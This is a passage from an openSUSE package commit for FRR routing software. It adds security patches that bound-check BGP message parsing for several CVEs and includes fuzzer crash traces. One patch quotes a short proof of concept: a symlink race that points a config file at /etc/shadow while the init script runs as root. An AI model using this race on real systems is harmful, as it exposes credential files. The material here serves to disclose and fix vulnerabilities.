pool/frr
SHA256
2
0
Fork 1
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

- fixed bug/pull request references in frr.changes file

Browse Source 
treat-as-withdraw outcome (CVE-2023-47235,bsc#1216896,6814f2e013)
  bsc#1216897,c37119df45)

OBS-URL: https://build.opensuse.org/package/show/network/frr?expand=0&rev=74
This commit is contained in:
Marius Tomaschewski 2024-09-16 10:13:01 +00:00 committed by Git OBS Bridge
commit 801844c464
31 changed files with 2799 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
.gitattributes vendored Normal file
View File

@ -0,0 +1,23 @@
## Default LFS
*.7z filter=lfs diff=lfs merge=lfs -text
*.bsp filter=lfs diff=lfs merge=lfs -text
*.bz2 filter=lfs diff=lfs merge=lfs -text
*.gem filter=lfs diff=lfs merge=lfs -text
*.gz filter=lfs diff=lfs merge=lfs -text
*.jar filter=lfs diff=lfs merge=lfs -text
*.lz filter=lfs diff=lfs merge=lfs -text
*.lzma filter=lfs diff=lfs merge=lfs -text
*.obscpio filter=lfs diff=lfs merge=lfs -text
*.oxt filter=lfs diff=lfs merge=lfs -text
*.pdf filter=lfs diff=lfs merge=lfs -text
*.png filter=lfs diff=lfs merge=lfs -text
*.rpm filter=lfs diff=lfs merge=lfs -text
*.tbz filter=lfs diff=lfs merge=lfs -text
*.tbz2 filter=lfs diff=lfs merge=lfs -text
*.tgz filter=lfs diff=lfs merge=lfs -text
*.ttf filter=lfs diff=lfs merge=lfs -text
*.txz filter=lfs diff=lfs merge=lfs -text
*.whl filter=lfs diff=lfs merge=lfs -text
*.xz filter=lfs diff=lfs merge=lfs -text
*.zip filter=lfs diff=lfs merge=lfs -text
*.zst filter=lfs diff=lfs merge=lfs -text

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
.osc

25
0001-disable-zmq-test.patch Normal file
View File

@ -0,0 +1,25 @@
From a19581f960db4c5f4f3b759e2d7ecf3e9ac73381 Mon Sep 17 00:00:00 2001
From: Ruben Torrero Marijnissen <rtorreromarijnissen@suse.com>
Date: Mon, 21 Dec 2020 18:36:43 +0000
Subject: [PATCH] tests: disable zeromq tests due to build service timeouts
References: bsc#1180217
---
tests/lib/test_zmq.py | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/tests/lib/test_zmq.py b/tests/lib/test_zmq.py
index 1f8ee5416..b298fe7b5 100644
--- a/tests/lib/test_zmq.py
+++ b/tests/lib/test_zmq.py
@@ -5,8 +5,7 @@ import os
program = "./test_zmq"
@pytest.mark.skipif(
- 'S["ZEROMQ_TRUE"]=""\n' not in open("../config.status").readlines(),
- reason="ZEROMQ not enabled",
+ reason="Test disabled due to intermittent build service timeouts"
)
def test_refout(self):
return super(TestZMQ, self).test_refout()
--
2.29.2

51
0002-bgpd-Check-the-actual-remaining-stream-length-before.patch Normal file
View File

@ -0,0 +1,51 @@
From 605485a7c470f6e49c3f5712f2c4692fea3019e7 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Wed, 31 Jul 2024 08:35:14 +0300
Subject: [PATCH] bgpd: Check the actual remaining stream length before taking
TLV value
Upstream: yes
References: CVE-2024-44070,bsc#1229438,gh#FRRouting/frr#16502
```
0 0xb50b9f898028 in __sanitizer_print_stack_trace (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x368028) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7)
1 0xb50b9f7ed8e4 in fuzzer::PrintStackTrace() (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x2bd8e4) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7)
2 0xb50b9f7d4d9c in fuzzer::Fuzzer::CrashCallback() (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x2a4d9c) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7)
3 0xe0d12d7469cc (linux-vdso.so.1+0x9cc) (BuildId: 1a77697e9d723fe22246cfd7641b140c427b7e11)
4 0xe0d12c88f1fc in __pthread_kill_implementation nptl/pthread_kill.c:43:17
5 0xe0d12c84a678 in gsignal signal/../sysdeps/posix/raise.c:26:13
6 0xe0d12c83712c in abort stdlib/abort.c:79:7
7 0xe0d12d214724 in _zlog_assert_failed /home/ubuntu/frr-public/frr_public_private-libfuzzer/lib/zlog.c:789:2
8 0xe0d12d1285e4 in stream_get /home/ubuntu/frr-public/frr_public_private-libfuzzer/lib/stream.c:324:3
9 0xb50b9f8e47c4 in bgp_attr_encap /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_attr.c:2758:3
10 0xb50b9f8dcd38 in bgp_attr_parse /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_attr.c:3783:10
11 0xb50b9faf74b4 in bgp_update_receive /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_packet.c:2383:20
12 0xb50b9faf1dcc in bgp_process_packet /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_packet.c:4075:11
13 0xb50b9f8c90d0 in LLVMFuzzerTestOneInput /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_main.c:582:3
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit 0998b38e4d61179441f90dd7e7fd6a3a8b7bd8c5)
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 40e074d058..4ebb45e3de 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -2727,6 +2727,14 @@ static int bgp_attr_encap(struct bgp_attr_parser_args *args)
args->total);
}
+ if (STREAM_READABLE(BGP_INPUT(peer)) < sublength) {
+ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining stream length %zu",
+ sublength, STREAM_READABLE(BGP_INPUT(peer)));
+ return bgp_attr_malformed(args,
+ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
+ }
+
/* alloc and copy sub-tlv */
/* TBD make sure these are freed when attributes are released */
tlv = XCALLOC(MTYPE_ENCAP_TLV,
--
2.43.0

93
0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch Normal file
View File

@ -0,0 +1,93 @@
From 401053f3ccc7be3a6a976f6f7f1674bdeb3c983e Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Thu, 20 Oct 2022 09:10:22 +0300
References: bsc#1204124,CVE-2022-42917,https://github.com/FRRouting/frr/pull/12157
Upstream: submitted
Subject: [PATCH] tools: Run as FRR_USER `install/chown` commands to avoid race
conditions
This is due to CVE-2022-42917: https://bugzilla.suse.com/show_bug.cgi?id=1204124
install/chown is in most cases (as I tested) is enough, but still, can be racy.
Tested on Linux/OpenBSD/NetBSD/FreeBSD, seems a unified way to do this.
For Linux `runuser` can be used, but *BSD do not have this command.
Proof of concept:
```
% sudo su - frr
[sudo] password for donatas:
su: warning: cannot change directory to /nonexistent: No such file or directory
frr@donatas-laptop:/home/donatas$ cd /etc/frr/
frr@donatas-laptop:/etc/frr$ rm -f zebra.conf; inotifywait -e CREATE .; rm -f zebra.conf; ln -s /etc/shadow zebra.conf
Setting up watches.
Watches established.
./ CREATE zebra.conf
frr@donatas-laptop:/etc/frr$ ls -la zebra.conf
lrwxrwxrwx 1 frr frr 11 spal. 20 09:25 zebra.conf -> /etc/shadow
frr@donatas-laptop:/etc/frr$ cat zebra.conf
cat: zebra.conf: Permission denied
frr@donatas-laptop:/etc/frr$
```
On the other terminal do:
```
/usr/lib/frr/frrinit.sh restart
```
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
diff --git a/tools/frr.in b/tools/frr.in
index e9f1122834..5f3f425a1e 100755
--- a/tools/frr.in
+++ b/tools/frr.in
@@ -96,10 +96,10 @@ check_daemon()
# check for config file
if [ -n "$2" ]; then
if [ ! -r "$C_PATH/$1-$2.conf" ]; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1-$2.conf"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1-$2.conf\""
fi
elif [ ! -r "$C_PATH/$1.conf" ]; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1.conf"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1.conf\""
fi
fi
return 0
@@ -524,7 +524,7 @@ convert_daemon_prios
if [ ! -d $V_PATH ]; then
echo "Creating $V_PATH"
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\""
chmod gu+x "${V_PATH}"
fi
diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in
index 61f1abb378..4d5d688d57 100755
--- a/tools/frrcommon.sh.in
+++ b/tools/frrcommon.sh.in
@@ -143,7 +143,7 @@ daemon_prep() {
cfg="$C_PATH/$daemon${inst:+-$inst}.conf"
if [ ! -r "$cfg" ]; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$cfg"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$cfg\""
fi
return 0
}
@@ -161,7 +161,7 @@ daemon_start() {
[ "$MAX_FDS" != "" ] && ulimit -n "$MAX_FDS" > /dev/null 2> /dev/null
daemon_prep "$daemon" "$inst" || return 1
if test ! -d "$V_PATH"; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\""
chmod gu+x "${V_PATH}"
fi
--
2.35.3

29
0004-tools-remove-backslash-from-declare-check-regex.patch Normal file
View File

@ -0,0 +1,29 @@
From 3474b220e036497e6bbe23428645217c275f9f87 Mon Sep 17 00:00:00 2001
From: Marius Tomaschewski <mt@suse.com>
Date: Fri, 11 Nov 2022 12:26:04 +0100
References: https://github.com/FRRouting/frr/pull/12307
Upstream: submitted
Subject: [PATCH] tools: remove backslash from declare check regex
The backslash in `grep -q '^declare \-a'` is not needed and
causes `grep: warning: stray \ before -` warning in grep-3.8.
---
tools/frrcommon.sh.in | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in
index 61f1abb378..3c16c27c6d 100755
--- a/tools/frrcommon.sh.in
+++ b/tools/frrcommon.sh.in
@@ -335,7 +335,7 @@ if [ -z "$FRR_PATHSPACE" ]; then
load_old_config "/etc/sysconfig/frr"
fi
-if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare \-a'; then
+if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare -a'; then
log_warning_msg "watchfrr_options contains a bash array value." \
"The configured value is intentionally ignored since it is likely wrong." \
"Please remove or fix the setting."
--
2.35.3

33
0005-root-ok-in-account-frr.pam.patch Normal file
View File

@ -0,0 +1,33 @@
From cb467471b31cd653e758bc3f82fffe7c44654796 Mon Sep 17 00:00:00 2001
From: Marius Tomaschewski <mt@suse.com>
Date: Fri, 11 Nov 2022 14:50:12 +0100
References: https://github.com/FRRouting/frr/pull/12308
Upstream: submitted
Subject: [PATCH] pam: declare root as sufficient frr pam account
https://github.com/FRRouting/frr/pull/11465 enabled account verification,
but the pam config declares rootok as sufficient in authentication only
and not in account verification, what causes warning in the log:
vtysh[3747]: pam_warn(frr:account): function=[pam_sm_acct_mgmt]
flags=0 service=[frr] terminal=[<unknown>] user=[root]
ruser=[<unknown>] rhost=[<unknown>]
---
redhat/frr.pam | 1 +
1 file changed, 1 insertion(+)
diff --git a/redhat/frr.pam b/redhat/frr.pam
index 5cef5d9d74..17a62f1999 100644
--- a/redhat/frr.pam
+++ b/redhat/frr.pam
@@ -5,6 +5,7 @@
# Only allow root (and possibly wheel) to use this because enable access
# is unrestricted.
auth sufficient pam_rootok.so
+account sufficient pam_rootok.so
# Uncomment the following line to implicitly trust users in the "wheel" group.
#auth sufficient pam_wheel.so trust use_uid
--
2.35.3

48
0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch Normal file
View File

@ -0,0 +1,48 @@
From d95229c9ba4c8ff99dfc644dd2d1e9e172fe3faf Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Fri, 24 Mar 2023 09:55:23 +0200
Upstream: yes
References: bsc#1211248,CVE-2023-31489,https://github.com/FRRouting/frr/pull/13100/commits/b1d33ec293e8e36fbb8766252f3b016d268e31ce
Subject: [PATCH] bgpd: Check 7 bytes for Long-lived Graceful-Restart
capability
It's not 4 bytes, it was assuming the same as Graceful-Restart tuples.
LLGR has more 3 bytes (Long-lived Stale Time).
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c
index d1667fac26..907e75e76b 100644
--- a/bgpd/bgp_open.c
+++ b/bgpd/bgp_open.c
@@ -599,12 +599,24 @@ static int bgp_capability_restart(struct peer *peer,
static int bgp_capability_llgr(struct peer *peer,
struct capability_header *caphdr)
{
+/*
+ * +--------------------------------------------------+
+ * | Address Family Identifier (16 bits) |
+ * +--------------------------------------------------+
+ * | Subsequent Address Family Identifier (8 bits) |
+ * +--------------------------------------------------+
+ * | Flags for Address Family (8 bits) |
+ * +--------------------------------------------------+
+ * | Long-lived Stale Time (24 bits) |
+ * +--------------------------------------------------+
+ */
+#define BGP_CAP_LLGR_MIN_PACKET_LEN 7
struct stream *s = BGP_INPUT(peer);
size_t end = stream_get_getp(s) + caphdr->length;
SET_FLAG(peer->cap, PEER_CAP_LLGR_RCV);
- while (stream_get_getp(s) + 4 <= end) {
+ while (stream_get_getp(s) + BGP_CAP_LLGR_MIN_PACKET_LEN <= end) {
afi_t afi;
safi_t safi;
iana_afi_t pkt_afi = stream_getw(s);
--
2.35.3

155
0007-bgpd-Ensure-stream-received-has-enough-data.patch Normal file
View File

@ -0,0 +1,155 @@
From 6d307ec2f5f5f9827f340a08941e6f78d09d1876 Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Tue, 6 Dec 2022 10:23:11 -0500
Upstream: yes
References: bsc#1211249,CVE-2023-31490,https://github.com/FRRouting/frr/pull/12454/commits/06431bfa7570f169637ebb5898f0b0cc3b010802
Subject: [PATCH] bgpd: Ensure stream received has enough data
BGP_PREFIX_SID_SRV6_L3_SERVICE attributes must not
fully trust the length value specified in the nlri.
Always ensure that the amount of data we need to read
can be fullfilled.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index b7d0958bac..c6177a1b93 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -2748,9 +2748,21 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
uint8_t sid_type, sid_flags;
char buf[BUFSIZ];
+ /*
+ * Check that we actually have at least as much data as
+ * specified by the length field
+ */
+ if (STREAM_READABLE(peer->curr) < length) {
+ flog_err(
+ EC_BGP_ATTR_LEN,
+ "Prefix SID specifies length %hu, but only %zu bytes remain",
+ length, STREAM_READABLE(peer->curr));
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
+ args->total);
+ }
+
if (type == BGP_PREFIX_SID_LABEL_INDEX) {
- if (STREAM_READABLE(peer->curr) < length
- || length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) {
+ if (length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) {
flog_err(EC_BGP_ATTR_LEN,
"Prefix SID label index length is %hu instead of %u",
length, BGP_PREFIX_SID_LABEL_INDEX_LENGTH);
@@ -2772,12 +2784,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
/* Store label index; subsequently, we'll check on
* address-family */
attr->label_index = label_index;
- }
-
- /* Placeholder code for the IPv6 SID type */
- else if (type == BGP_PREFIX_SID_IPV6) {
- if (STREAM_READABLE(peer->curr) < length
- || length != BGP_PREFIX_SID_IPV6_LENGTH) {
+ } else if (type == BGP_PREFIX_SID_IPV6) {
+ if (length != BGP_PREFIX_SID_IPV6_LENGTH) {
flog_err(EC_BGP_ATTR_LEN,
"Prefix SID IPv6 length is %hu instead of %u",
length, BGP_PREFIX_SID_IPV6_LENGTH);
@@ -2791,10 +2799,7 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
stream_getw(peer->curr);
stream_get(&ipv6_sid, peer->curr, 16);
- }
-
- /* Placeholder code for the Originator SRGB type */
- else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) {
+ } else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) {
/*
* ietf-idr-bgp-prefix-sid-05:
* Length is the total length of the value portion of the
@@ -2819,19 +2824,6 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
args->total);
}
- /*
- * Check that we actually have at least as much data as
- * specified by the length field
- */
- if (STREAM_READABLE(peer->curr) < length) {
- flog_err(EC_BGP_ATTR_LEN,
- "Prefix SID Originator SRGB specifies length %hu, but only %zu bytes remain",
- length, STREAM_READABLE(peer->curr));
- return bgp_attr_malformed(
- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
- args->total);
- }
-
/*
* Check that the portion of the TLV containing the sequence of
* SRGBs corresponds to a multiple of the SRGB size; to get
@@ -2855,12 +2847,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
stream_get(&srgb_base, peer->curr, 3);
stream_get(&srgb_range, peer->curr, 3);
}
- }
-
- /* Placeholder code for the VPN-SID Service type */
- else if (type == BGP_PREFIX_SID_VPN_SID) {
- if (STREAM_READABLE(peer->curr) < length
- || length != BGP_PREFIX_SID_VPN_SID_LENGTH) {
+ } else if (type == BGP_PREFIX_SID_VPN_SID) {
+ if (length != BGP_PREFIX_SID_VPN_SID_LENGTH) {
flog_err(EC_BGP_ATTR_LEN,
"Prefix SID VPN SID length is %hu instead of %u",
length, BGP_PREFIX_SID_VPN_SID_LENGTH);
@@ -2896,39 +2884,22 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
attr->srv6_vpn->sid_flags = sid_flags;
sid_copy(&attr->srv6_vpn->sid, &ipv6_sid);
attr->srv6_vpn = srv6_vpn_intern(attr->srv6_vpn);
- }
-
- /* Placeholder code for the SRv6 L3 Service type */
- else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) {
- if (STREAM_READABLE(peer->curr) < length) {
+ } else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) {
+ if (STREAM_READABLE(peer->curr) < 1) {
flog_err(
EC_BGP_ATTR_LEN,
- "Prefix SID SRv6 L3-Service length is %hu, but only %zu bytes remain",
- length, STREAM_READABLE(peer->curr));
- return bgp_attr_malformed(args,
- BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
- args->total);
+ "Prefix SID SRV6 L3 Service not enough data left, it must be at least 1 byte");
+ return bgp_attr_malformed(
+ args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
+ args->total);
}
-
/* ignore reserved */
stream_getc(peer->curr);
return bgp_attr_srv6_service(args);
}
-
/* Placeholder code for Unsupported TLV */
else {
-
- if (STREAM_READABLE(peer->curr) < length) {
- flog_err(
- EC_BGP_ATTR_LEN,
- "Prefix SID SRv6 length is %hu - too long, only %zu remaining in this UPDATE",
- length, STREAM_READABLE(peer->curr));
- return bgp_attr_malformed(
- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
- args->total);
- }
-
if (bgp_debug_update(peer, NULL, NULL, 1))
zlog_debug(
"%s attr Prefix-SID sub-type=%u is not supported, skipped",
--
2.35.3

29
0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch Normal file
View File

@ -0,0 +1,29 @@
From a6c5ef48cb086b94a5b911af4ee9f675213fb14b Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Sun, 20 Aug 2023 22:15:27 +0300
Upstream: yes
References: CVE-2023-41360,bsc#1214739,https://github.com/FRRouting/frr/pull/14245
Subject: [PATCH] bgpd: Don't read the first byte of ORF header if we are ahead
of stream
Reported-by: Iggy Frankovic iggyfran@amazon.com
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 72d6a92317..4947dbc21d 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -2375,7 +2375,8 @@ static int bgp_route_refresh_receive(struct peer *peer, bgp_size_t size)
* and 7 bytes of ORF Address-filter entry from
* the stream
*/
- if (*p_pnt & ORF_COMMON_PART_REMOVE_ALL) {
+ if (p_pnt < p_end &&
+ *p_pnt & ORF_COMMON_PART_REMOVE_ALL) {
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP rcvd Remove-All pfxlist ORF request",
--
2.35.3

100
0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch Normal file
View File

@ -0,0 +1,100 @@
From e51ca641b4a96e575be069aeea922e31f7b8dfa4 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Tue, 22 Aug 2023 22:52:04 +0300
Upstream: yes
References: CVE-2023-41358,bsc#1214735,https://github.com/FRRouting/frr/pull/14260
Subject: [PATCH] bgpd: Do not process NLRIs if the attribute length is
zero
```
3 0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26
4 0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=<optimized out>) at lib/sigevent.c:246
5 <signal handler called>
6 0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400)
at bgpd/bgp_routemap.c:2258
7 0x00007f423aeec7e0 in route_map_apply_ext (map=<optimized out>, prefix=prefix@entry=0x7fffc414ea30,
match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690
8 0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770,
afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130)
at bgpd/bgp_route.c:1772
9 0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0,
attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=<optimized out>, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0,
num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374
10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0)
at bgpd/bgp_route.c:6249
11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50,
packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339
12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024
13 0x0000564dea2c901d in bgp_process_packet (thread=<optimized out>) at bgpd/bgp_packet.c:2933
14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at lib/event.c:1995
15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213
16 0x0000564dea261b83 in main (argc=<optimized out>, argv=<optimized out>) at bgpd/bgp_main.c:505
```
With the configuration:
```
frr version 9.1-dev-MyOwnFRRVersion
frr defaults traditional
hostname ip-172-31-13-140
log file /tmp/debug.log
log syslog
service integrated-vtysh-config
!
debug bgp keepalives
debug bgp neighbor-events
debug bgp updates in
debug bgp updates out
!
router bgp 100
bgp router-id 9.9.9.9
no bgp ebgp-requires-policy
bgp bestpath aigp
neighbor 172.31.2.47 remote-as 200
!
address-family ipv4 unicast
neighbor 172.31.2.47 default-originate
neighbor 172.31.2.47 route-map RM_IN in
exit-address-family
exit
!
route-map RM_IN permit 10
set as-path prepend 200
exit
!
```
The issue is that we try to process NLRIs even if the attribute length is 0.
Later bgp_update() will handle route-maps and a crash occurs because all the
attributes are NULL, including aspath, where we dereference.
According to the RFC 4271:
A value of 0 indicates that neither the Network Layer
Reachability Information field nor the Path Attribute field is
present in this UPDATE message.
But with a fuzzed UPDATE message this can be faked. I think it's reasonable
to skip processing NLRIs if both update_len and attribute_len are 0.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 4947dbc21d..1ef421028f 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -1951,7 +1951,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
/* Network Layer Reachability Information. */
update_len = end - stream_pnt(s);
- if (update_len) {
+ if (update_len && attribute_len) {
/* Set NLRI portion to structure. */
nlris[NLRI_UPDATE].afi = AFI_IP;
nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
--
2.35.3

131
0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch Normal file
View File

@ -0,0 +1,131 @@
From 129adde0aef424778d6c4791b5be10e302db9320 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Thu, 13 Jul 2023 22:32:03 +0300
Upstream: yes
References: CVE-2023-38802,bsc#1213284,https://github.com/FRRouting/frr/pull/14290
Subject: [PATCH] bgpd: Use treat-as-withdraw for tunnel encapsulation
attribute
Before this path we used session reset method, which is discouraged by rfc7606.
Handle this as rfc requires.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index c6177a1b93..188393b752 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -1301,6 +1301,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
case BGP_ATTR_LARGE_COMMUNITIES:
case BGP_ATTR_ORIGINATOR_ID:
case BGP_ATTR_CLUSTER_LIST:
+ case BGP_ATTR_ENCAP:
case BGP_ATTR_OTC:
return BGP_ATTR_PARSE_WITHDRAW;
case BGP_ATTR_MP_REACH_NLRI:
@@ -2426,26 +2427,21 @@ bgp_attr_ipv6_ext_communities(struct bgp_attr_parser_args *args)
}
/* Parse Tunnel Encap attribute in an UPDATE */
-static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
- bgp_size_t length, /* IN: attr's length field */
- struct attr *attr, /* IN: caller already allocated */
- uint8_t flag, /* IN: attr's flags field */
- uint8_t *startp)
+static int bgp_attr_encap(struct bgp_attr_parser_args *args)
{
- bgp_size_t total;
uint16_t tunneltype = 0;
-
- total = length + (CHECK_FLAG(flag, BGP_ATTR_FLAG_EXTLEN) ? 4 : 3);
+ struct peer *const peer = args->peer;
+ struct attr *const attr = args->attr;
+ bgp_size_t length = args->length;
+ uint8_t type = args->type;
+ uint8_t flag = args->flags;
if (!CHECK_FLAG(flag, BGP_ATTR_FLAG_TRANS)
|| !CHECK_FLAG(flag, BGP_ATTR_FLAG_OPTIONAL)) {
- zlog_info(
- "Tunnel Encap attribute flag isn't optional and transitive %d",
- flag);
- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR,
- startp, total);
- return -1;
+ zlog_err("Tunnel Encap attribute flag isn't optional and transitive %d",
+ flag);
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
if (BGP_ATTR_ENCAP == type) {
@@ -2453,12 +2449,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
uint16_t tlv_length;
if (length < 4) {
- zlog_info(
+ zlog_err(
"Tunnel Encap attribute not long enough to contain outer T,L");
- bgp_notify_send_with_data(
- peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total);
- return -1;
+ return bgp_attr_malformed(args,
+ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
tunneltype = stream_getw(BGP_INPUT(peer));
tlv_length = stream_getw(BGP_INPUT(peer));
@@ -2488,13 +2483,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
}
